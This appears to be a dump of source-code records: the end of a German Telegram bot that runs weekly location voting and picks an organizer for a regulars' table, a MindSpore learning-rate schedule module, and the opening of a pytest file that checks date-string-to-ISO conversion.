KEY("chat_id","member_id") )''') c.execute('''CREATE TABLE IF NOT EXISTS "member_credits" ( "chat_id" INTEGER, "member_id" INTEGER, "credits" INTEGER, PRIMARY KEY("chat_id","member_id") )''') ###### ## Liste mit den Locations fuer den Stammtisch ###### def load_locations(): conn = sqlite3.connect('DummerStammtischBot.db') c = conn.cursor() locations = {} print('Lade Locations...') print('-----------------------------------') for row in c.execute('SELECT chat_id, l_id, location FROM locations'): if row[0] not in locations: print ('Chat ID: %s' % (str(row[0]))) print('-----------------------------------') locations[row[0]] = [] locations[row[0]].append((row[1], row[2])) print(u'Location hinzugefuegt: ID: %d, %d' % (row[0], row[1]) ) conn.close() return locations # Lade Locations wenn die Datei fuer locations existiert locations = load_locations() # Wenn keine Location existiert, erzeuge eine leere Liste if locations == None: locations = {} ###### ## Liste mit den Chats die der Bot angehoert ###### def load_chatrooms(): conn = sqlite3.connect('DummerStammtischBot.db') c = conn.cursor() chatrooms = {} for row in c.execute('SELECT chat_id, stammtischtag, last_notified, last_voting_notification, last_organizer FROM chatrooms'): chatrooms[row[0]] = [row[1],row[2], row[3], row[4]] conn.close() return chatrooms # Lade chatrooms wenn die Datei fuer chatrooms existiert chatrooms = load_chatrooms() # Wenn keine Location existiert, erzeuge eine leere Liste if chatrooms == None: chatrooms = {} conn.commit() conn.close() ###### ## Methoden fuer den Chatbot ###### # Fuehrt ein Query aus, liefert keine Daten zurueck def execute_query(query, args): conn = sqlite3.connect('DummerStammtischBot.db') c = conn.cursor() c.execute(query, args) conn.commit() conn.close() # Fuert ein Query aus, liefert das Resultat als 2D-Array zurueck def execute_select(query, args): conn = sqlite3.connect('DummerStammtischBot.db') c = conn.cursor() result = [] for row in c.execute(query, args): 
result.append(row) conn.close() return result # Fuegt einen neuen Gruppenchat hinzu, in dem der Bot hinzugefuegt wurde def add_chatroom(chat_id): if chat_id not in chatrooms: chatrooms[chat_id] = [DEFAULT_STAMMTISCHTAG, 0, 0] print('New chatroom: ' + str(chat_id)) execute_query('INSERT INTO chatrooms (chat_id, stammtischtag, last_notified, last_voting_notification) VALUES (?, ?, 0, 0)', [chat_id, chatrooms[chat_id][0]]) # Entfernt alle Daten ueber einen Gruppenchat, asu dem der Bot entfernt wurde def remove_chatroom(chat_id): if chat_id in chatrooms: print('Removed from Chat: ' + str(chat_id)) chatrooms.pop(chat_id, None) locations.pop(chat_id, None) execute_query('DELETE FROM chatrooms WHERE chat_id = ?', [chat_id]) execute_query('DELETE FROM votings WHERE chat_id = ?', [chat_id]) execute_query('DELETE FROM locations WHERE chat_id = ?', [chat_id]) print('Removed from chatroom: %s' % chat_id) def start(update, context): add_chatroom(update.message.chat.id) context.bot.send_message(chat_id=update.message.chat_id, text="I'm a bot, please talk to me!") # Prueft ob der User der Nachricht der Admin oder der Ersteller ist. # Bei beiden liefert er True zurueck def has_admin(update, context): chat_id = update.message.chat.id user = context.bot.get_chat_member(update.message.chat.id, update.message.from_user.id) is_admin = 'administrator' == user.status is_creator = 'creator' == user.status return is_admin or is_creator # Prueft ob der aufrufende Benutzer von einem Admin voice erhalten hat # Falls ja, kann dieser User die erweiterten Funktionen des Bots nutzen def has_voice(update, context): chat_id = update.message.chat.id user_id = update.message.from_user.id is_voiced = execute_select('SELECT 1 FROM voiced WHERE chat_id = ? AND member_id = ?', [chat_id, user_id]) return len(is_voiced) > 0 # Erteilt einem Benutzer Voice. Darf nur von Admins ausgefuehrt werden. 
def voice(update, context):
    """/voice handler: grant a mentioned user access to the extended
    functions. Admins only."""
    chat_id = update.message.chat.id
    is_admin = has_admin(update, context)
    if not is_admin:
        update.message.reply_text(u'Nur Admins können diese Funktion benutzen')
        return
    # Only text_mention entities carry a .user object.
    for mention in update.message.entities:
        if mention.user is not None:
            user_id = mention.user.id
            user_name = mention.user.first_name
            # Delete-then-insert keeps the (chat_id, member_id) row unique.
            execute_query('DELETE FROM voiced WHERE chat_id = ? AND member_id = ?', [chat_id, user_id])
            execute_query('INSERT INTO voiced (chat_id, member_id) VALUES (?, ?)', [chat_id, user_id])
            update.message.reply_text(u'%s wurde authorisiert' % (user_name))


def revoke(update, context):
    """/revoke handler: withdraw a mentioned user's voice. Admins only."""
    chat_id = update.message.chat.id
    is_admin = has_admin(update, context)
    if not is_admin:
        update.message.reply_text(u'Nur Admins können diese Funktion benutzen')
        return
    for mention in update.message.entities:
        if mention.user is not None:
            user_id = mention.user.id
            user_name = mention.user.first_name
            execute_query('DELETE FROM voiced WHERE chat_id = ? AND member_id = ?', [chat_id, user_id])
            update.message.reply_text(u'%s kann die erweiterten Funktionen nicht mehr nutzen' % (user_name))


# Adds a location to the Stammtisch targets.
# Allowed for voiced users and admins.
def add_location(update, context):
    """/add handler: add a new location for this chat (voiced users/admins)."""
    global locations
    add_chatroom(update.message.chat.id)
    chat_id = update.message.chat.id
    location = ' '.join(context.args).strip()
    is_admin = has_admin(update, context)
    is_voiced = has_voice(update, context)
    if not is_admin and not is_voiced:
        update.message.reply_text(u'Du hast keine Berechtigung einen Ort hinzuzufügen, frage einen Admin ob er dich dazu berechtigt.')
        return
    if chat_id not in locations:
        locations[chat_id] = []
    # BUG FIX: the limit previously compared len(locations) — the number of
    # chats — instead of this chat's location count.
    if location and location not in locations[chat_id] and len(locations[chat_id]) < MAX_LOCATIONS:
        # l_id is the per-chat running number: max(l_id)+1, or 1 for the first.
        execute_query('''INSERT INTO locations (chat_id, l_id, location)
                         VALUES (?, Ifnull((SELECT max(l_id)+1 FROM locations WHERE chat_id = ?), 1), ?)''',
                      (chat_id, chat_id, location))
        locations = load_locations()
        update.message.reply_text('Das Ziel ' + location + u' wurde hinzugefügt')
    elif len(locations[chat_id]) >= MAX_LOCATIONS:
        # BUG FIX: the %s placeholder had no format argument.
        update.message.reply_text('Ihr habt das Limit von %s Locations erreicht, sorry!' % MAX_LOCATIONS)


def list_locations(update, context):
    """/list handler: show all locations available for this chat."""
    message = u'Folgende Stammtischziele stehen zur Verfügung:\r\n'
    if update.message.chat.id in locations:
        for loc in locations[update.message.chat.id]:
            message = message + str(loc[0]) + '. ' + loc[1] + '\r\n'
        context.bot.send_message(chat_id=update.message.chat_id, text=message)
    else:
        context.bot.send_message(chat_id=update.message.chat_id, text=u'Es gibt noch keine Stammtischziele, füge welche mit /add hinzu')


# Loescht einen Ort.
# (cont.) Deleting a location is allowed for admins only.
def del_location(update, context):
    """/del handler: delete a location by its numeric id (admins only)."""
    global locations
    add_chatroom(update.message.chat.id)
    chat_id = update.message.chat.id
    # Robustness fix: a missing or non-numeric argument previously raised
    # an uncaught ValueError.
    try:
        location_id = int(' '.join(context.args).strip())
    except ValueError:
        update.message.reply_text('Die Location existiert nicht (mehr)!')
        return
    is_admin = has_admin(update, context)
    if not is_admin:
        update.message.reply_text(u'Du hast keine Berechtigung einen Ort zu löschen, frage einen Admin ob den Ort für dich löscht.')
        return
    if chat_id not in locations:
        locations[chat_id] = []
    loc_exist = False
    loc_name = ''
    for loc in locations[chat_id]:
        if loc[0] == location_id:
            loc_exist = True
            loc_name = loc[1]
            break
    if location_id and loc_exist:
        execute_query('''DELETE FROM locations WHERE chat_id = ? AND l_id = ?''', (chat_id, location_id))
        locations = load_locations()
        update.message.reply_text('Das Ziel ' + str(location_id) + '. ' + loc_name + u' wurde gelöscht')
    else:
        update.message.reply_text('Die Location existiert nicht (mehr)!')


def set_stammtischtag(update, context):
    """/stammtischtag handler: set the weekday (1=Mon .. 7=Sun) of the
    Stammtisch; voting day depends on it. Admins only."""
    chat_id = update.message.chat.id
    is_admin = has_admin(update, context)
    if not is_admin:
        update.message.reply_text(u'Du bist kein Admin, sorry!')
        return
    for arg in context.args:
        try:
            tag = int(arg)
            if chat_id in chatrooms and tag >= 1 and tag <= 7:
                # BUG FIX: previously the whole cached list was replaced by
                # the bare int; only the weekday (index 0) must change.
                chatrooms[chat_id][0] = tag
                execute_query('UPDATE chatrooms SET stammtischtag = ? WHERE chat_id = ?', [tag, chat_id])
                update.message.reply_text(u'Der Stammtischtag wurde auf %s gesetzt' % TAGE[tag])
            elif tag < 1 or tag > 7:
                update.message.reply_text(u'Erlaubte Werte sind 1 bis 7 für Mon bis Son')
        except ValueError:
            update.message.reply_text(u'Erlaubte Werte sind 1 bis 7 für Mon bis Son')


def new_member(update, context):
    """Event handler: fires when members (possibly the bot itself) join."""
    for member in update.message.new_chat_members:
        print(member)
        if member.username == 'DummerStammtischBot':
            add_chatroom(update.message.chat.id)
            context.bot.send_message(chat_id=update.message.chat_id, text=u'Hallo zusammen, ich bin eurem Chat beigetreten\r\nFolgende Befehl stehen euch zur Auswahl:\r\n /stammtischtag oder /st: Legt den Tag des Stammtischs fest\r\n /add: Ein Stammtischziel hinzufügen\r\n /list: Alle Stammtischziele anzeigen')
        else:
            update.message.reply_text(u'Hallo ' + member.username + ', willkommen am Stammtisch!')


def left_member(update, context):
    """Event handler: fires when a member (possibly the bot itself) leaves."""
    member = update.message.left_chat_member
    print(member)
    if member.username == 'DummerStammtischBot':
        remove_chatroom(update.message.chat.id)


def help(update, context):
    """/help handler: list all available commands."""
    context.bot.send_message(chat_id=update.message.chat_id, text=u'''Ich bin der StammtischBot!\r\n Folgende Befhele stehen euch zur Auswahl: [Admins] /stammtischtag oder /st: Legt den Tag des Stammtischs fest /voice [1..x]: Der angegebene Benutzer kann die erweiterte Funktionen nutzen /revoke [1..x]: Entzieht den angegebenen Benutzern die Rechte auf die erweiterten funktionen. [Erweiterte Funktionen] /add: Ein Stammtischziel hinzufügen /del: Löscht einen Ort [Alle] /list: Alle Stammtischziele anzeigen /help: Diese Nachricht anzeigen /not_today: Der aktuelle Organisator kann die Orge eine Stunde nach der Entscheidung abgeben''')


def is_voting_time(chat_id, message_date):
    """Return True while the chat is inside its voting window
    (08:00-18:00 on the day before the Stammtisch)."""
    # Weekday of the message (1=Mon .. 7=Sun to match the config values)
    weekday = message_date.weekday() + 1
    # Hour of the message, shifted into the local timezone
    hour = message_date.hour + TIME_ZONE_MOD
    # Voting happens the day BEFORE the Stammtisch
    dayToNotifyAt = chatrooms[chat_id][0] - 1
    lastNotified = chatrooms[chat_id][1]
    lastVotingNotified = chatrooms[chat_id][2]
    print('--------------------------------------------------')
    print('Check is voting time')
    print('--------------------------------------------------')
    print('Weekday: %d' % (weekday))
    print('Hour: %d' % (hour))
    print('Day to notify: %d' % (dayToNotifyAt))
    print('Last voting: %d' % (lastNotified))
    print('Last voting ended: %d' % (lastVotingNotified))
    print('Notify today: %s' % (str(dayToNotifyAt == weekday and hour >= 8 and hour < 18)))
    print('--------------------------------------------------')
    return dayToNotifyAt == weekday and hour >= 8 and hour < 18


def notifier(context):
    """Periodic job: opens the vote after 08:00 on the day before the
    Stammtisch and closes it after 18:00, announcing the result and
    picking a random organizer (excluding last week's)."""
    for chat_id in chatrooms:
        now = int(time.time())
        weekday = datetime.datetime.today().weekday() + 1
        hour = datetime.datetime.now().hour
        print('Hour: %s' % (hour))
        dayToNotifyAt = chatrooms[chat_id][0] - 1
        lastNotified = chatrooms[chat_id][1]
        lastVotingNotified = chatrooms[chat_id][2]
        # Open the vote at most once per week (518400 s = 6 days), after 08:00.
        if dayToNotifyAt == weekday and lastNotified + 518400 < now and hour >= 8:
            print("Notifying %s" % chat_id)
            execute_query('DELETE FROM votings WHERE chat_id = ?', [chat_id])
            message = u'Hallo, morgen ist wieder Stammtisch. Bitte voted bis heute um 18 Uhr, für ein Ziel.\nWenn man voted muss man kommen, sonst gibts Haue!\n\n'
            if chat_id in locations:
                message += u'Folgende Stammtischziele stehen zur Verfügung:\r\n'
                for loc in locations[chat_id]:
                    message += '%s. %s\r\n' % (loc[0], loc[1])
                message += u'\nStimme mit 1 bis %s ab' % len(locations[chat_id])
            else:
                message += u'Leider gibt es noch keine Ziele. Füge welche mit /add <Name> hinzu'
            context.bot.send_message(chat_id=chat_id, text=message)
            execute_query('UPDATE chatrooms SET last_notified = ? WHERE chat_id = ?', [now, chat_id])
            chatrooms[chat_id][1] = now
        # Close the vote at most once per week, after 18:00.
        if dayToNotifyAt == weekday and lastVotingNotified + 518400 < now and hour >= 18:
            last_organizer = chatrooms[chat_id][3]
            conn = sqlite3.connect('DummerStammtischBot.db')
            c = conn.cursor()
            message = 'Die Abstimmungszeit ist vorbei! Ihr habt wie folgt abgestimmt:\n\n'
            i = 1
            for row in c.execute('select (SELECT location FROm locations l WHERE l.l_id = v.location_id AND l.chat_id = v.chat_id) location, count(*) c FROM votings v WHERE chat_id = ? GROUP BY location_id ORDER BY c DESC', [chat_id]):
                message += '%s. %s (%s Stimmen)\n' % (i, row[0], row[1])
                i += 1
            organisierer = c.execute('SELECT member_name, member_id FROM votings v WHERE chat_id = ? AND member_id IN (SELECT member_id FROM votings v2 WHERE chat_id = ? AND member_id IS NOT ? ORDER BY RANDOM() LIMIT 1)', [chat_id, chat_id, last_organizer]).fetchone()
            # BUG FIX: the connection was never closed (leak).
            conn.close()
            # Robustness fix: with no votes, fetchone() returns None and
            # indexing it crashed the whole job.
            if organisierer is None:
                continue
            message += '\n%s darf diese Woche den Stammtisch organisieren' % organisierer[0]
            org_member_id = organisierer[1]
            context.bot.send_message(chat_id=chat_id, text=message)
            execute_query('UPDATE chatrooms SET last_voting_notification = ?, last_organizer = ? WHERE chat_id = ?', [now, org_member_id, chat_id])
            # BUG FIX: 'member_id' was an undefined name here; the credit
            # bookkeeping belongs to the newly chosen organizer.
            # A first-time organizer starts with 4 credits.
            credits = execute_select('SELECT credits FROM member_credits WHERE chat_id = ? AND member_id = ?', [chat_id, org_member_id])
            if len(credits) == 0:
                execute_query('INSERT INTO member_credits(chat_id, member_id, credits) VALUES (?, ?, ?)', [chat_id, org_member_id, 4])
            # Organizing earns one credit.
            execute_query('UPDATE member_credits SET credits = credits+1 WHERE chat_id = ? AND member_id = ?', [chat_id, org_member_id])
            chatrooms[chat_id][2] = now
            chatrooms[chat_id][3] = org_member_id


def vote(update, context):
    """Group-message handler: during voting time, a bare number equal to a
    location id counts as the author's (single) vote."""
    print('------------------------------------')
    print('Voting...')
    print('------------------------------------')
    chat_id = update.message.chat.id
    user_id = update.message.from_user.id
    user_name = update.message.from_user.first_name
    message_date = update.message.date
    print(u'%s hat mit %s abgestimmt' % (user_name, update.message.text))
    print('Is voting time: %s' % (str(is_voting_time(chat_id, message_date))))
    if chat_id in chatrooms and is_voting_time(chat_id, message_date):
        print('Chatgroup is included')
        try:
            auswahl = int(update.message.text.strip())
            valid_selection = False
            for l in locations[chat_id]:
                if auswahl == l[0]:
                    valid_selection = True
            if auswahl >= 1 and valid_selection:
                print('Auswahl ist vorhanden')
                # One vote per member: replace any previous vote.
                execute_query('DELETE FROM votings WHERE chat_id = ? AND member_id = ?', [chat_id, user_id])
                execute_query('INSERT INTO votings (chat_id, member_id, member_name, location_id) VALUES (?, ?, ?, ?)', [chat_id, user_id, user_name, auswahl])
                location = execute_select('SELECT location FROM locations WHERE chat_id = ? AND l_id = ?', [chat_id, auswahl])[0]
                print('Location ist %s' % (location[0]))
                update.message.reply_text(u'%s hat für %s gestimmt' % (update.message.from_user.first_name, location[0]))
        except ValueError:
            # Non-numeric group messages are simply not votes.
            pass
    print('------------------------------------')


def has_enought_member_credits(update, context):
    """Return True and deduct 3 credits if the caller can afford /not_today.
    A member who never organized starts with 4 credits."""
    chat_id = update.message.chat.id
    user_id = update.message.from_user.id
    credits = execute_select('SELECT credits FROM member_credits WHERE chat_id = ? AND member_id = ?', [chat_id, user_id])
    if len(credits) == 0:
        # BUG FIX: used the undefined name 'member_id' instead of 'user_id'.
        execute_query('INSERT INTO member_credits(chat_id, member_id, credits) VALUES (?, ?, ?)', [chat_id, user_id, 4])
        credits = execute_select('SELECT credits FROM member_credits WHERE chat_id = ? AND member_id = ?', [chat_id, user_id])
    # BUG FIX: execute_select returns a list of rows, not a cursor, so
    # .fetchone() raised AttributeError; index the first row instead.
    credits = credits[0][0]
    enougth_credits = False
    if credits >= 3:
        enougth_credits = True
        execute_query('UPDATE member_credits SET credits = credits-3 WHERE chat_id = ? AND member_id = ?', [chat_id, user_id])
    return enougth_credits


def is_nottoday_time(chat_id, message_date):
    """Return True during the one-hour window (18:00-19:59 on voting day)
    in which the chosen organizer may still hand off via /not_today."""
    weekday = message_date.weekday() + 1
    hour = message_date.hour
    dayToNotifyAt = chatrooms[chat_id][0] - 1
    return dayToNotifyAt == weekday and hour >= 18 and hour <= 19


def not_today(update, context):
    """/not_today handler: the current organizer pays 3 credits to re-run
    the organizer draw (excluding themselves via last_organizer)."""
    chat_id = update.message.chat.id
    user_id = update.message.from_user.id
    message_date = update.message.date
    if chat_id in chatrooms and is_nottoday_time(chat_id, message_date) and user_id == chatrooms[chat_id][3]:
        if has_enought_member_credits(update, context):
            update.message.reply_text(u'%s möchte heute nicht den Stammtisch organisieren, es wird ein neuer Organisator gewählt.' % (update.message.from_user.first_name))
            # BUG FIX: 'now' was an undefined name in this function.
            now = int(time.time())
            last_organizer = chatrooms[chat_id][3]
            conn = sqlite3.connect('DummerStammtischBot.db')
            c = conn.cursor()
            message = 'Die Abstimmungszeit ist vorbei! Ihr habt wie folgt abgestimmt:\n\n'
            i = 1
            for row in c.execute('select (SELECT location FROm locations l WHERE l.l_id = v.location_id AND l.chat_id = v.chat_id) location, count(*) c FROM votings v WHERE chat_id = ? GROUP BY location_id ORDER BY c DESC', [chat_id]):
                message += '%s. %s (%s Stimmen)\n' % (i, row[0], row[1])
                i += 1
            organisierer = c.execute('SELECT member_name, member_id FROM votings v WHERE chat_id = ? AND member_id IN (SELECT member_id FROM votings v2 WHERE chat_id = ? AND member_id IS NOT ? ORDER BY RANDOM() LIMIT 1)', [chat_id, chat_id, last_organizer]).fetchone()
            # BUG FIX: connection leak; also guard against an empty draw.
            conn.close()
            if organisierer is None:
                return
            # BUG FIX: the result was referenced as the undefined name 'org'.
            message += '\n%s darf diese Woche den Stammtisch organisieren' % organisierer[0]
            org_member_id = organisierer[1]
            context.bot.send_message(chat_id=chat_id, text=message)
            execute_query('UPDATE chatrooms SET last_voting_notification = ?, last_organizer = ? WHERE chat_id = ?', [now, org_member_id, chat_id])
            # BUG FIX: credit bookkeeping mixed user_id and the undefined
            # 'member_id'; it belongs to the NEW organizer (as in notifier()).
            credits = execute_select('SELECT credits FROM member_credits WHERE chat_id = ? AND member_id = ?', [chat_id, org_member_id])
            if len(credits) == 0:
                execute_query('INSERT INTO member_credits(chat_id, member_id, credits) VALUES (?, ?, ?)', [chat_id, org_member_id, 4])
            execute_query('UPDATE member_credits SET credits = credits+1 WHERE chat_id = ? AND member_id = ?', [chat_id, org_member_id])
            chatrooms[chat_id][2] = now
            chatrooms[chat_id][3] = org_member_id
        else:
            update.message.reply_text(u'Du hast leider nicht genug Credits um die Organisation abzugeben!')
    elif chat_id in chatrooms and is_nottoday_time(chat_id, message_date):
        update.message.reply_text(u'Der Zeitraum die Organisation abzugeben ist leider schon vorbei!')
    elif chat_id in chatrooms and user_id != chatrooms[chat_id][3]:
        update.message.reply_text(u'Du Organisierst den Stammtisch heute gar nicht!')
    else:
        update.message.reply_text(u'Etwas ist schiefgegangen?!?!!?')


######
## Bot Stuff.
Init, Mappen der handler/methoden ###### updater = Updater(token=TOKEN, use_context=True) dispatcher = updater.dispatcher jobqueue = updater.job_queue start_handler = CommandHandler('start', start) dispatcher.add_handler(start_handler) # Job jede Minute job_minute = jobqueue.run_repeating(notifier, interval=600, first=20) # Fuegt eine Location zu den moeglichen Stammtischzielen hinzu add_handler = CommandHandler('add', add_location) dispatcher.add_handler(add_handler) # Loescht eine Location del_handler = CommandHandler('del', del_location) dispatcher.add_handler(del_handler) # Listet alle Stammtischzielen list_handler = CommandHandler('list', list_locations) dispatcher.add_handler(list_handler) # Benutzer mehr Berechtigung geben voice_handler = CommandHandler('voice', voice) dispatcher.add_handler(voice_handler) # Benutzer mehr Berechtigung geben revoke_handler = CommandHandler('revoke', revoke) dispatcher.add_handler(revoke_handler) # Organisator gibt orga ab not_today_handler = CommandHandler('not_today', not_today) dispatcher.add_handler(not_today_handler) # Setzt den Stammtischtag stammtischtag_handler = CommandHandler('stammtischtag', set_stammtischtag) st_handler = CommandHandler('st', set_stammtischtag) dispatcher.add_handler(stammtischtag_handler) dispatcher.add_handler(st_handler) # Hilfetext anzeigen help_handler = CommandHandler('help', help) dispatcher.add_handler(help_handler) # Eventhandler, wenn der Bot einem Chat hinzugefuegt wird dispatcher.add_handler(MessageHandler(Filters.status_update.new_chat_members, new_member)) # Eventhandler, wenn der Bot aus einem Chat entfernt wird dispatcher.add_handler(MessageHandler(Filters.status_update.left_chat_member, left_member)) # Echo handler vote_handler = MessageHandler(Filters.group, vote) dispatcher.add_handler(vote_handler) updater.start_polling() # Allen chats sagen, dass der Bot Online ist #for chatid in chatrooms: # updater.bot.send_message(chat_id=int(chatid), text='Ich bin Online!') updater.idle()
44.326087
312
0.674086
e66b64c090062fa4320308b0f75296dcc8e8c5a4
2,436
py
Python
official/cv/retinaface_resnet50/src/lr_schedule.py
leelige/mindspore
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
[ "Apache-2.0" ]
77
2021-10-15T08:32:37.000Z
2022-03-30T13:09:11.000Z
official/cv/retinaface_resnet50/src/lr_schedule.py
leelige/mindspore
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
[ "Apache-2.0" ]
3
2021-10-30T14:44:57.000Z
2022-02-14T06:57:57.000Z
official/cv/retinaface_resnet50/src/lr_schedule.py
leelige/mindspore
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
[ "Apache-2.0" ]
24
2021-10-15T08:32:45.000Z
2022-03-24T18:45:20.000Z
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""learning rate schedule."""
import math
from .config import cfg_res50


def _linear_warmup_learning_rate(current_step, warmup_steps, base_lr, init_lr):
    """Linearly ramp the LR from init_lr towards base_lr over warmup_steps."""
    step_increment = (float(base_lr) - float(init_lr)) / float(warmup_steps)
    return float(init_lr) + step_increment * current_step


def _a_cosine_learning_rate(current_step, base_lr, warmup_steps, decay_steps):
    """Cosine-annealed LR for the post-warmup phase."""
    progress = float(current_step - warmup_steps) / float(decay_steps)
    return (1 + math.cos(progress * math.pi)) / 2 * base_lr


def _dynamic_lr(base_lr, total_steps, warmup_steps, warmup_ratio=1 / 3):
    """Per-step LR list: linear warmup followed by cosine decay."""
    return [
        _linear_warmup_learning_rate(step, warmup_steps, base_lr, base_lr * warmup_ratio)
        if step < warmup_steps
        else _a_cosine_learning_rate(step, base_lr, warmup_steps, total_steps)
        for step in range(total_steps)
    ]


def adjust_learning_rate(initial_lr, gamma, stepvalues, steps_pre_epoch, total_epochs, warmup_epoch=5):
    """Build the complete per-step LR schedule.

    Uses the cosine 'dynamic_lr' schedule when configured; otherwise an
    exponential warmup (base 1.5849 ~= 10**0.2) followed by step decay by
    gamma at the two epoch boundaries in `stepvalues`.
    """
    if cfg_res50['lr_type'] == 'dynamic_lr':
        return _dynamic_lr(initial_lr, total_epochs * steps_pre_epoch,
                           warmup_epoch * steps_pre_epoch, warmup_ratio=1 / 3)
    lr_each_step = []
    for epoch in range(1, total_epochs + 1):
        if epoch <= warmup_epoch:
            lr = 0.1 * initial_lr * (1.5849 ** (epoch - 1))
        elif stepvalues[0] <= epoch <= stepvalues[1]:
            lr = initial_lr * (gamma ** (1))
        elif epoch > stepvalues[1]:
            lr = initial_lr * (gamma ** (2))
        else:
            lr = initial_lr
        # Same LR for every step within the epoch
        lr_each_step.extend([lr] * steps_pre_epoch)
    return lr_each_step
39.290323
103
0.64491
fc36197e9b5f7a39f94875fa5f46ff8640aed7c6
5,903
py
Python
Packs/CommonScripts/Scripts/DateStringToISOFormat/DateStringToISOFormat_test.py
diCagri/content
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
[ "MIT" ]
799
2016-08-02T06:43:14.000Z
2022-03-31T11:10:11.000Z
Packs/CommonScripts/Scripts/DateStringToISOFormat/DateStringToISOFormat_test.py
diCagri/content
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
[ "MIT" ]
9,317
2016-08-07T19:00:51.000Z
2022-03-31T21:56:04.000Z
Packs/CommonScripts/Scripts/DateStringToISOFormat/DateStringToISOFormat_test.py
diCagri/content
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
[ "MIT" ]
1,297
2016-08-04T13:59:00.000Z
2022-03-31T23:43:06.000Z
from DateStringToISOFormat import parse_datestring_to_iso
import demistomock as demisto
import pytest

# Each case: date_value, day_first, year_first, fuzzy, add_utc_timezone, expected_output
testdata = [
    ('05-11-2929', True, True, True, True, '2929-11-05T00:00:00+00:00'),
    ('05-11-2929', True, False, True, True, '2929-11-05T00:00:00+00:00'),
    ('05-11-2929', True, True, False, True, '2929-11-05T00:00:00+00:00'),
    ('05-11-2929', True, False, False, False, '2929-11-05T00:00:00'),
    ('05-11-2929', False, True, True, False, '2929-05-11T00:00:00'),
    ('05-11-2929', False, False, True, False, '2929-05-11T00:00:00'),
    ('05-11-2929', False, False, False, False, '2929-05-11T00:00:00'),
    ('2020-06-11T17:34:35.754203+03:00', True, True, True, True, '2020-11-06T17:34:35.754203+03:00'),
    ('2020-06-11T17:34:35.754203+03:00', True, False, True, True, '2020-11-06T17:34:35.754203+03:00'),
    ('2020-06-11T17:34:35.754203+03:00', True, True, False, True, '2020-11-06T17:34:35.754203+03:00'),
    ('2020-06-11T17:34:35.754203+03:00', True, False, False, True, '2020-11-06T17:34:35.754203+03:00'),
    ('2020-06-11T17:34:35.754203+03:00', False, True, True, False, '2020-06-11T17:34:35.754203+03:00'),
    ('2020-06-11T17:34:35.754203+03:00', False, False, True, False, '2020-06-11T17:34:35.754203+03:00'),
    ('2020-06-11T17:34:35.754203+03:00', False, False, False, False, '2020-06-11T17:34:35.754203+03:00'),
    ("June 21st 2020 Eastern Standard Time", True, True, True, True, "2020-06-21T00:00:00+00:00"),
    ("June 21st 2020 Eastern Standard Time", True, False, True, True, "2020-06-21T00:00:00+00:00"),
    ("June 21st 2020 Eastern Standard Time", True, True, False, True, "June 21st 2020 Eastern Standard Time"),
    ("June 21st 2020 Eastern Standard Time", True, False, False, True, "June 21st 2020 Eastern Standard Time"),
    ("June 21st 2020 Eastern Standard Time", False, True, True, False, "2020-06-21T00:00:00"),
    ("June 21st 2020 Eastern Standard Time", False, False, True, False, "2020-06-21T00:00:00"),
    ("June 21st 2020 Eastern Standard Time", False, False, False, False, "June 21st 2020 Eastern Standard Time"),
    ("The 1st of June 2020", True, True, True, True, "2020-06-01T00:00:00+00:00"),
    ("The 1st of June 2020", True, False, True, True, "2020-06-01T00:00:00+00:00"),
    ("The 1st of June 2020", True, True, False, True, "The 1st of June 2020"),
    ("The 1st of June 2020", True, False, False, True, "The 1st of June 2020"),
    ("The 1st of June 2020", False, True, True, False, "2020-06-01T00:00:00"),
    ("The 1st of June 2020", False, False, True, False, "2020-06-01T00:00:00"),
    ("The 1st of June 2020", False, False, False, False, "The 1st of June 2020"),
    ('2020-06-11T17:34:35.754Z', False, False, False, True, '2020-06-11T17:34:35.754000+00:00'),
    ('2020-06-11T17:34:35.754Z', True, True, True, True, '2020-11-06T17:34:35.754000+00:00'),
    ('2020-06-11T17:34:35.754Z', True, False, True, True, '2020-11-06T17:34:35.754000+00:00'),
    ('2020-06-11T17:34:35.754Z', True, True, False, True, '2020-11-06T17:34:35.754000+00:00'),
    ('2020-06-11T17:34:35.754Z', True, False, False, True, '2020-11-06T17:34:35.754000+00:00'),
    ('2020-06-11T17:34:35.754Z', False, True, True, False, '2020-06-11T17:34:35.754000+00:00'),
    ('2020-06-11T17:34:35.754Z', False, False, True, False, '2020-06-11T17:34:35.754000+00:00'),
    ('2020-06-11T17:34:35.754Z', False, False, False, False, '2020-06-11T17:34:35.754000+00:00'),
    ('Fri, 20 Nov 2020 11:41:42', False, False, False, True, '2020-11-20T11:41:42+00:00'),
    ('Fri, 20 Nov 2020 11:41:42', True, True, True, True, '2020-11-20T11:41:42+00:00'),
    ('Fri, 20 Nov 2020 11:41:42', True, False, True, True, '2020-11-20T11:41:42+00:00'),
    ('Fri, 20 Nov 2020 11:41:42', True, True, False, True, '2020-11-20T11:41:42+00:00'),
    ('Fri, 20 Nov 2020 11:41:42', True, False, False, True, '2020-11-20T11:41:42+00:00'),
    ('Fri, 20 Nov 2020 11:41:42', False, True, True, False, '2020-11-20T11:41:42'),
    ('Fri, 20 Nov 2020 11:41:42', False, False, True, False, '2020-11-20T11:41:42'),
    ('Fri, 20 Nov 2020 11:41:42', False, False, False, False, '2020-11-20T11:41:42'),
    ('Fri, 20 Nov 2020 11:41:42', False, False, False, False, '2020-11-20T11:41:42'),
]


@pytest.mark.parametrize('date_value,day_first,year_first,fuzzy,add_utc_timezone,expected_output', testdata)
def test_parse_datestring_to_iso(mocker, date_value, day_first, year_first, fuzzy, add_utc_timezone, expected_output):
    """Scenario: Parse an arbitrary date string and convert it to ISO 8601 format

    Given
    - An arbitrary date string
    When
    - The date string can be an ambiguous 3-integer date, fuzzy date string
      or an already iso-8601 formatted date string
    Then
    - Ensure the output date string is in iso-8601 format in all cases

    Args:
        date_value (str): A string containing a date stamp.
        day_first (bool): Whether to interpret the first value in an ambiguous
            3-integer date (e.g. 01/05/09) as the day or month.
        year_first (bool): Whether to interpret the first value in an ambiguous
